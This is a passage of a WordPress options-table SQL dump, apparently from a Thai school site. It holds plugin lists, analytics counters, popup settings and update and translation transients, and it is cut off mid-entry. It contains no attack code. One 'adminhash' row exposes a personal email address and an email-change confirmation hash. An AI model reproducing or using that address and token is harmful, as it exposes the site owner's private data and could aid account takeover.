(652,'activate_plugins','a:12:{i:0;s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:59:\"content-views-query-and-display-post-page/content-views.php\";i:3;s:25:\"generateblocks/plugin.php\";i:4;s:41:\"kadence-blocks-pro/kadence-blocks-pro.php\";i:5;s:33:\"kadence-blocks/kadence-blocks.php\";i:6;s:15:\"kirki/kirki.php\";i:7;s:55:\"nextend-smart-slider3-pro/nextend-smart-slider3-pro.php\";i:8;s:47:\"one-click-demo-import/one-click-demo-import.php\";i:9;s:31:\"popup-builder/popup-builder.php\";i:10;s:25:\"seed-fonts/seed-fonts.php\";i:11;s:27:\"seed-social/seed-social.php\";}','auto'),
(653,'widget_koko-analytics-most-viewed-posts','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(654,'koko_analytics_version','2.0.19','on'),
(656,'koko_analytics_last_aggregation_at','1763352895','on'),
(668,'koko_analytics_realtime_pageview_count','a:4:{i:1763350920;i:1;i:1763351280;i:1;i:1763351400;i:1;i:1763351820;i:1;}','off'),
(12371,'recovery_mode_email_last_sent','1724821771','auto'),
(12484,'sgpb-all-dismissed-notifications','[]','auto'),
(28609,'kirki_notices','a:1:{s:15:\"discount_notice\";i:1;}','auto'),
(66077,'db_upgraded','','on'),
(66134,'_transient_wp_styles_for_blocks','a:2:{s:4:\"hash\";s:32:\"c35beb8e50211f21b8f7ed377699be2d\";s:6:\"blocks\";a:6:{s:11:\"core/button\";s:0:\"\";s:14:\"core/site-logo\";s:0:\"\";s:18:\"core/post-template\";s:120:\":where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}\";s:18:\"core/term-template\";s:120:\":where(.wp-block-term-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-term-template.is-layout-grid){gap: 1.25em;}\";s:12:\"core/columns\";s:102:\":where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}\";s:14:\"core/pullquote\";s:69:\":root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}\";}}','on'),
(66330,'_site_transient_update_themes','O:8:\"stdClass\":1:{s:12:\"last_checked\";i:1775180371;}','off'),
(1103475,'generateblocks','a:1:{s:20:\"disable_google_fonts\";b:0;}','auto'),
(1103476,'gb_use_v1_blocks','1','off'),
(1141114,'sgpb-all-removed-notifications','{\"sgpbMainRateUsNotification\":\"sgpbMainRateUsNotification\",\"sgpbMainSupportBanner\":\"sgpbMainSupportBanner\"}','auto'),
(1150414,'koko_analytics_referrers_v2','1','on'),
(1150437,'awplife_tbms_plugin_version','0.1.15','auto'),
(1150438,'sgpopup_customPostType_categories','a:17:{s:5:\"param\";a:7:{s:8:\"not_rule\";s:11:\"Select rule\";s:10:\"everywhere\";s:10:\"Everywhere\";s:4:\"Post\";a:4:{s:8:\"post_all\";s:9:\"All posts\";s:13:\"post_selected\";s:14:\"Selected posts\";s:9:\"post_type\";s:9:\"Post type\";s:13:\"post_category\";s:13:\"Post category\";}s:4:\"Page\";a:3:{s:8:\"page_all\";s:9:\"All pages\";s:13:\"page_selected\";s:14:\"Selected pages\";s:9:\"page_type\";s:9:\"Page type\";}s:9:\"Templates\";a:1:{s:13:\"page_template\";s:18:\"Post/Page template\";}s:4:\"Tags\";a:2:{s:9:\"post_tags\";s:8:\"All tags\";s:13:\"post_tags_ids\";s:13:\"Selected tags\";}s:13:\"tbms_cpt_name\";a:4:{s:17:\"tbms_cpt_name_all\";s:18:\"All Tbms_cpt_names\";s:21:\"tbms_cpt_name_archive\";s:23:\"Archives Tbms_cpt_names\";s:22:\"tbms_cpt_name_selected\";s:21:\"Select Tbms_cpt_names\";s:24:\"tbms_cpt_name_categories\";s:31:\"Select Tbms_cpt_name categories\";}}s:8:\"operator\";a:2:{s:2:\"==\";s:2:\"Is\";s:2:\"!=\";s:6:\"Is not\";}s:13:\"post_selected\";a:0:{}s:13:\"page_selected\";a:0:{}s:9:\"post_type\";a:1:{s:13:\"tbms_cpt_name\";s:13:\"tbms_cpt_name\";}s:13:\"post_category\";a:0:{}s:9:\"page_type\";a:5:{s:12:\"is_home_page\";s:9:\"Home Page\";s:7:\"is_home\";s:10:\"Posts Page\";s:9:\"is_search\";s:12:\"Search Pages\";s:6:\"is_404\";s:9:\"404 Pages\";s:10:\"is_archive\";s:12:\"Archive Page\";}s:13:\"page_template\";a:9:{s:8:\"page.php\";s:16:\"Default Template\";s:23:\"page-templates/form.php\";s:4:\"Form\";s:26:\"page-templates/landing.php\";s:12:\"Landing Page\";s:34:\"page-templates/leftbar-subpage.php\";s:23:\"Left Sidebar (Sub Page)\";s:26:\"page-templates/leftbar.php\";s:12:\"Left Sidebar\";s:31:\"page-templates/leftrightbar.php\";s:20:\"Left & Right Sidebar\";s:27:\"page-templates/rightbar.php\";s:13:\"Right Sidebar\";s:27:\"page-templates/salepage.php\";s:10:\"Sales Page\";s:23:\"page-templates/soon.php\";s:11:\"Coming Soon\";}s:13:\"post_tags_ids\";a:0:{}s:10:\"everywhere\";N;s:8:\"not_rule\";N;s:8:\"post_all\";N;s:8:\"page_all\";N;s:9:\"post_tags\";N;s:17:\"tbms_cpt_name_all\";N;s:22:\"tbms_cpt_name_selected\";s:0:\"\";s:24:\"tbms_cpt_name_categories\";a:4:{i:3;s:57:\"ข่าวกิจกรรมโรงเรียน\";i:1;s:51:\"ข่าวประชาสัมพันธ์\";i:5;s:57:\"จดหมายประชาสัมพันธ์\";i:4;s:49:\"ผลงานนักเรียน/ครู\";}}','auto'),
(1171475,'adminhash','a:2:{s:4:\"hash\";s:32:\"eb2a8dd8e51befecdca07031857c9f40\";s:8:\"newemail\";s:19:\"Outansama@gmail.com\";}','off'),
(1171478,'_site_transient_timeout_browser_b6070f97dd99fd1a1f729156efd61e89','1775188676','off'),
(1171479,'_site_transient_browser_b6070f97dd99fd1a1f729156efd61e89','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"145.0.0.0\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','off'),
(1171485,'wp_notes_notify','1','on'),
(1171487,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.9.4.zip\";s:6:\"locale\";s:2:\"th\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.9.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.9.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.9.4-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.9.4\";s:7:\"version\";s:5:\"6.9.4\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1775180367;s:15:\"version_checked\";s:5:\"6.9.4\";s:12:\"translations\";a:0:{}}','off'),
(1171488,'can_compress_scripts','0','on'),
(1171870,'_site_transient_timeout_php_check_76d2cd2a5eb29facccd351abf19ed9c8','1775397597','off'),
(1171871,'_site_transient_php_check_76d2cd2a5eb29facccd351abf19ed9c8','a:5:{s:19:\"recommended_version\";s:3:\"8.3\";s:15:\"minimum_version\";s:6:\"7.2.24\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','off'),
(1172603,'_site_transient_timeout_theme_roots','1775182168','off'),
(1172604,'_site_transient_theme_roots','a:1:{s:5:\"plant\";s:7:\"/themes\";}','off'),
(1172605,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1775180370;s:8:\"response\";a:6:{s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:39:\"w.org/plugins/advanced-google-recaptcha\";s:4:\"slug\";s:25:\"advanced-google-recaptcha\";s:6:\"plugin\";s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";s:11:\"new_version\";s:4:\"1.33\";s:3:\"url\";s:56:\"https://wordpress.org/plugins/advanced-google-recaptcha/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/advanced-google-recaptcha.1.33.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/advanced-google-recaptcha/assets/icon-256x256.png?rev=2493018\";s:2:\"1x\";s:78:\"https://ps.w.org/advanced-google-recaptcha/assets/icon-256x256.png?rev=2493018\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/advanced-google-recaptcha/assets/banner-1544x500.png?rev=2493021\";s:2:\"1x\";s:80:\"https://ps.w.org/advanced-google-recaptcha/assets/banner-772x250.png?rev=2493154\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"5.2\";s:16:\"requires_plugins\";a:0:{}}s:25:\"generateblocks/plugin.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/generateblocks\";s:4:\"slug\";s:14:\"generateblocks\";s:6:\"plugin\";s:25:\"generateblocks/plugin.php\";s:11:\"new_version\";s:5:\"2.2.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/generateblocks/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/generateblocks.2.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:59:\"https://ps.w.org/generateblocks/assets/icon.svg?rev=3239461\";s:3:\"svg\";s:59:\"https://ps.w.org/generateblocks/assets/icon.svg?rev=3239461\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/generateblocks/assets/banner-1544x500.png?rev=3239461\";s:2:\"1x\";s:69:\"https://ps.w.org/generateblocks/assets/banner-772x250.png?rev=3239461\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.5\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:33:\"kadence-blocks/kadence-blocks.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/kadence-blocks\";s:4:\"slug\";s:14:\"kadence-blocks\";s:6:\"plugin\";s:33:\"kadence-blocks/kadence-blocks.php\";s:11:\"new_version\";s:5:\"3.6.6\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/kadence-blocks/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/kadence-blocks.3.6.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/kadence-blocks/assets/icon-256x256.png?rev=3178382\";s:2:\"1x\";s:67:\"https://ps.w.org/kadence-blocks/assets/icon-128x128.png?rev=3178382\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/kadence-blocks/assets/banner-1544x500.jpg?rev=3178382\";s:2:\"1x\";s:69:\"https://ps.w.org/kadence-blocks/assets/banner-772x250.jpg?rev=3178382\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.6\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:15:\"kirki/kirki.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:19:\"w.org/plugins/kirki\";s:4:\"slug\";s:5:\"kirki\";s:6:\"plugin\";s:15:\"kirki/kirki.php\";s:11:\"new_version\";s:5:\"5.2.2\";s:3:\"url\";s:36:\"https://wordpress.org/plugins/kirki/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/kirki.5.2.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:58:\"https://ps.w.org/kirki/assets/icon-256x256.jpg?rev=2947788\";s:2:\"1x\";s:58:\"https://ps.w.org/kirki/assets/icon-256x256.jpg?rev=2947788\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:61:\"https://ps.w.org/kirki/assets/banner-1544x500.jpg?rev=2947788\";s:2:\"1x\";s:60:\"https://ps.w.org/kirki/assets/banner-772x250.jpg?rev=2947788\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:31:\"popup-builder/popup-builder.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/popup-builder\";s:4:\"slug\";s:13:\"popup-builder\";s:6:\"plugin\";s:31:\"popup-builder/popup-builder.php\";s:11:\"new_version\";s:5:\"4.4.3\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/popup-builder/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/popup-builder.4.4.3.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/popup-builder/assets/icon-128x128.gif?rev=2698840\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/popup-builder/assets/banner-772x250.jpg?rev=2698842\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.2\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:5:\"5.3.3\";s:16:\"requires_plugins\";a:0:{}}s:61:\"team-builder-member-showcase/team-builder-member-showcase.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:42:\"w.org/plugins/team-builder-member-showcase\";s:4:\"slug\";s:28:\"team-builder-member-showcase\";s:6:\"plugin\";s:61:\"team-builder-member-showcase/team-builder-member-showcase.php\";s:11:\"new_version\";s:6:\"0.1.16\";s:3:\"url\";s:59:\"https://wordpress.org/plugins/team-builder-member-showcase/\";s:7:\"package\";s:78:\"https://downloads.wordpress.org/plugin/team-builder-member-showcase.0.1.16.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/team-builder-member-showcase/assets/icon-256x256.gif?rev=2293274\";s:2:\"1x\";s:81:\"https://ps.w.org/team-builder-member-showcase/assets/icon-128x128.gif?rev=2293274\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:83:\"https://ps.w.org/team-builder-member-showcase/assets/banner-772x250.jpg?rev=3109219\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.4\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}s:14:\"upgrade_notice\";s:91:\"<p>Bug fixes and WordPress 6.9 compatibility testing. Update recommended for all users.</p>\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:4:{s:59:\"content-views-query-and-display-post-page/content-views.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:55:\"w.org/plugins/content-views-query-and-display-post-page\";s:4:\"slug\";s:41:\"content-views-query-and-display-post-page\";s:6:\"plugin\";s:59:\"content-views-query-and-display-post-page/content-views.php\";s:11:\"new_version\";s:3:\"4.3\";s:3:\"url\";s:72:\"https://wordpress.org/plugins/content-views-query-and-display-post-page/\";s:7:\"package\";s:88:\"https://downloads.wordpress.org/plugin/content-views-query-and-display-post-page.4.3.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:86:\"https://ps.w.org/content-views-query-and-display-post-page/assets/icon.svg?rev=2932226\";s:3:\"svg\";s:86:\"https://ps.w.org/content-views-query-and-display-post-page/assets/icon.svg?rev=2932226\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:96:\"https://ps.w.org/content-views-query-and-display-post-page/assets/banner-772x250.png?rev=3390320\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:47:\"one-click-demo-import/one-click-demo-import.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:35:\"w.org/plugins/one-click-demo-import\";s:4:\"slug\";s:21:\"one-click-demo-import\";s:6:\"plugin\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:11:\"new_version\";s:5:\"3.4.0\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/one-click-demo-import/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/one-click-demo-import.3.4.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-256x256.png?rev=2506685\";s:2:\"1x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-128x128.png?rev=2506685\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/one-click-demo-import/assets/banner-1544x500.png?rev=2506685\";s:2:\"1x\";s:76:\"https://ps.w.org/one-click-demo-import/assets/banner-772x250.png?rev=2506685\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";}s:25:\"seed-fonts/seed-fonts.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/seed-fonts\";s:4:\"slug\";s:10:\"seed-fonts\";s:6:\"plugin\";s:25:\"seed-fonts/seed-fonts.php\";s:11:\"new_version\";s:5:\"2.4.2\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/seed-fonts/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/seed-fonts.2.4.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/seed-fonts/assets/icon-256x256.png?rev=1670226\";s:2:\"1x\";s:63:\"https://ps.w.org/seed-fonts/assets/icon-128x128.png?rev=1670224\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/seed-fonts/assets/banner-1544x500.png?rev=1934593\";s:2:\"1x\";s:65:\"https://ps.w.org/seed-fonts/assets/banner-772x250.png?rev=1934592\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:27:\"seed-social/seed-social.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/seed-social\";s:4:\"slug\";s:11:\"seed-social\";s:6:\"plugin\";s:27:\"seed-social/seed-social.php\";s:11:\"new_version\";s:5:\"2.0.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/seed-social/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/seed-social.2.0.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/seed-social/assets/icon-256x256.jpg?rev=3086884\";s:2:\"1x\";s:64:\"https://ps.w.org/seed-social/assets/icon-128x128.jpg?rev=3086883\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/seed-social/assets/banner-1544x500.jpg?rev=3086923\";s:2:\"1x\";s:66:\"https://ps.w.org/seed-social/assets/banner-772x250.jpg?rev=3086923\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";}}s:7:\"checked\";a:10:{s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";s:4:\"1.31\";s:59:\"content-views-query-and-display-post-page/content-views.php\";s:3:\"4.3\";s:25:\"generateblocks/plugin.php\";s:5:\"2.1.2\";s:33:\"kadence-blocks/kadence-blocks.php\";s:6:\"3.5.27\";s:15:\"kirki/kirki.php\";s:5:\"5.1.0\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:5:\"3.4.0\";s:31:\"popup-builder/popup-builder.php\";s:5:\"4.4.2\";s:25:\"seed-fonts/seed-fonts.php\";s:5:\"2.4.2\";s:27:\"seed-social/seed-social.php\";s:5:\"2.0.6\";s:61:\"team-builder-member-showcase/team-builder-member-showcase.php\";s:6:\"0.1.15\";}}','off'),
(1172666,'_site_transient_timeout_available_translations','1775225221','off'),
(1172667,'_site_transient_available_translations','a:132:{s:2:\"af\";a:8:{s:8:\"language\";s:2:\"af\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-05-13 15:59:22\";s:12:\"english_name\";s:9:\"Afrikaans\";s:11:\"native_name\";s:9:\"Afrikaans\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/af.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"af\";i:2;s:3:\"afr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Gaan voort\";}}s:2:\"am\";a:8:{s:8:\"language\";s:2:\"am\";s:7:\"version\";s:6:\"6.0.11\";s:7:\"updated\";s:19:\"2022-09-29 20:43:49\";s:12:\"english_name\";s:7:\"Amharic\";s:11:\"native_name\";s:12:\"አማርኛ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.0.11/am.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"am\";i:2;s:3:\"amh\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"ቀጥል\";}}s:3:\"arg\";a:8:{s:8:\"language\";s:3:\"arg\";s:7:\"version\";s:8:\"6.2-beta\";s:7:\"updated\";s:19:\"2022-09-22 16:46:56\";s:12:\"english_name\";s:9:\"Aragonese\";s:11:\"native_name\";s:9:\"Aragonés\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.2-beta/arg.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"an\";i:2;s:3:\"arg\";i:3;s:3:\"arg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continar\";}}s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"6.4.8\";s:7:\"updated\";s:19:\"2024-02-13 12:49:38\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.4.8/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"متابعة\";}}s:3:\"ary\";a:8:{s:8:\"language\";s:3:\"ary\";s:7:\"version\";s:6:\"4.8.27\";s:7:\"updated\";s:19:\"2017-01-26 15:42:35\";s:12:\"english_name\";s:15:\"Moroccan Arabic\";s:11:\"native_name\";s:31:\"العربية المغربية\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.27/ary.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:3;s:3:\"ary\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"as\";a:8:{s:8:\"language\";s:2:\"as\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-29 14:19:02\";s:12:\"english_name\";s:8:\"Assamese\";s:11:\"native_name\";s:21:\"অসমীয়া\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/as.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"as\";i:2;s:3:\"asm\";i:3;s:3:\"asm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:3:\"azb\";a:8:{s:8:\"language\";s:3:\"azb\";s:7:\"version\";s:5:\"6.4.8\";s:7:\"updated\";s:19:\"2024-01-19 08:58:31\";s:12:\"english_name\";s:17:\"South Azerbaijani\";s:11:\"native_name\";s:29:\"گؤنئی آذربایجان\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.4.8/azb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:3;s:3:\"azb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-06 00:09:27\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:3:\"bel\";a:8:{s:8:\"language\";s:3:\"bel\";s:7:\"version\";s:6:\"4.9.28\";s:7:\"updated\";s:19:\"2024-12-26 00:37:42\";s:12:\"english_name\";s:10:\"Belarusian\";s:11:\"native_name\";s:29:\"Беларуская мова\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.9.28/bel.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"be\";i:2;s:3:\"bel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Працягнуць\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-02 09:00:09\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Напред\";}}s:5:\"bn_BD\";a:8:{s:8:\"language\";s:5:\"bn_BD\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-07 06:54:04\";s:12:\"english_name\";s:20:\"Bengali (Bangladesh)\";s:11:\"native_name\";s:15:\"বাংলা\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/bn_BD.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"bn\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:28:\"চালিয়ে যান\";}}s:2:\"bo\";a:8:{s:8:\"language\";s:2:\"bo\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2020-10-30 03:24:38\";s:12:\"english_name\";s:7:\"Tibetan\";s:11:\"native_name\";s:21:\"བོད་ཡིག\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/bo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bo\";i:2;s:3:\"tib\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:33:\"མུ་མཐུད་དུ།\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2023-02-22 20:45:53\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.9/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 04:40:01\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:3:\"ceb\";a:8:{s:8:\"language\";s:3:\"ceb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-02 17:25:51\";s:12:\"english_name\";s:7:\"Cebuano\";s:11:\"native_name\";s:7:\"Cebuano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ceb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"ceb\";i:3;s:3:\"ceb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Padayun\";}}s:5:\"cs_CZ\";a:8:{s:8:\"language\";s:5:\"cs_CZ\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 06:23:08\";s:12:\"english_name\";s:5:\"Czech\";s:11:\"native_name\";s:9:\"Čeština\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/cs_CZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cs\";i:2;s:3:\"ces\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Pokračovat\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-20 11:38:29\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 